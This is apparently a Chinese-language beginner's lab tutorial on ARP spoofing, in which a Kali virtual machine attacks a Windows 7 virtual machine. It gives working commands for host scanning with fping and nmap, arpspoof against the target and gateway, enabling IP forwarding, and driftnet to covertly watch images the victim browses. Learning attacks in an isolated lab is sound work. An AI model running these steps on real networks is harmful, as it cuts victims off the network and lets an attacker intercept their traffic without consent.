Arp欺骗
地址解析协议,即ARP(AddressResolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。
条件:kali虚拟机,windows7靶机虚拟机
寻找目标主机
ifconfig
可以得到本机ip是192.168.43.242,内网ip为192.168.43.xx,子网掩码为255.255.255.0
(255.255.255.0换成二进制是24个1,表示为/24,所以0/24代表子网掩码为255.255.255.0以下的所有主机)
扫描内网中的主机
fping –asg 内网号.0/24
或者nmap –sP内网号.0/24
192.168.43.242是本机,192.168.43.50是主机,则192.168.43.72就是目标机的ip
由于两台虚拟机都是桥接模式,桥接模式下,VMWare虚拟出来的操作系统就像是局域网中的一台独立的主机(主机和虚拟机处于对等地位)
在NAT模式下,虚拟系统需要借助NAT(网络地址转换)功能,通过宿主机器所在的网络来访问公网。也就是说,使用NAT模式虚拟系统可把物理主机作为路由器访问互联网。
这时候可以进行arp欺骗了
arpspoof -i eth0 -t 目标ip 主机ip(路由器)
使用这个命令获取到从目标ip 发往 主机ip(路由器)的流量
arpspoof -i eth0–t 192.168.43.72 192.168.43.1
开始发送请求包
Windows7这边已经断网
ctrl+c 取消发送包
Windows7正常上网
arp -a出现的信息是指当前电脑所缓存的mac地址和ip地址对应表
windows7
当前网关mac地址是 02-1a-11-f1-3c-c5
Kali虚拟机也就是192.168.43.242的mac地址是00-0c-29-8d-b1-86
当arp欺骗包发送后
网关mac地址变为00-0c-29-8d-b1-86,就是kali虚拟机的mac地址
Arp欺骗就是当windows7虚拟机发送流量请求的时候,kali直接进行回应,将自己的mac地址返回给windows7,windows7收到的回应不是能上网的网关mac的回应,自然就不能上网
流量转发
查看目标主机在线浏览的图片,并且让目标主机察觉不到。
首先开启流量转发功能:出于安全考虑,Linux系统默认是禁止数据包转发的。
所谓转发即当主机拥有多于一块的网卡时,其中一块收到数据包,根据数据包的目的ip地址将包发往本机另一网卡,
该网卡根据路由表继续发送数据包。这通常就是路由器所要实现的功能。
配置Linux系统的ip转发功能,首先保证硬件连通,然后打开系统的转发功能
less /proc/sys/net/ipv4/ip_forward,该文件内容为0,表示禁止数据包转发,1表示允许,将其修改为1。可使用命令echo 1 >> /proc/sys/net/ipv4/ip_forward修改文件内容,重启网络服务或主机后效果不再。
若要其自动执行,可将命令echo 1 >> /proc/sys/net/ipv4/ip_forward写入脚本/etc/rc.d/rc.local 或者 在/etc/sysconfig/network脚本中添加 FORWARD_IPV4="YES"
cat /proc/sys/net/ipv4/ip_forward查看流量转发状态
arp欺骗
arpspoof -i eth0 -t 目标ip 主机ip(路由器)
driftnet –i eth0 打开窗口流量监控
结果
成功
渗透菜鸟表示有什么不对的求大佬能指正带路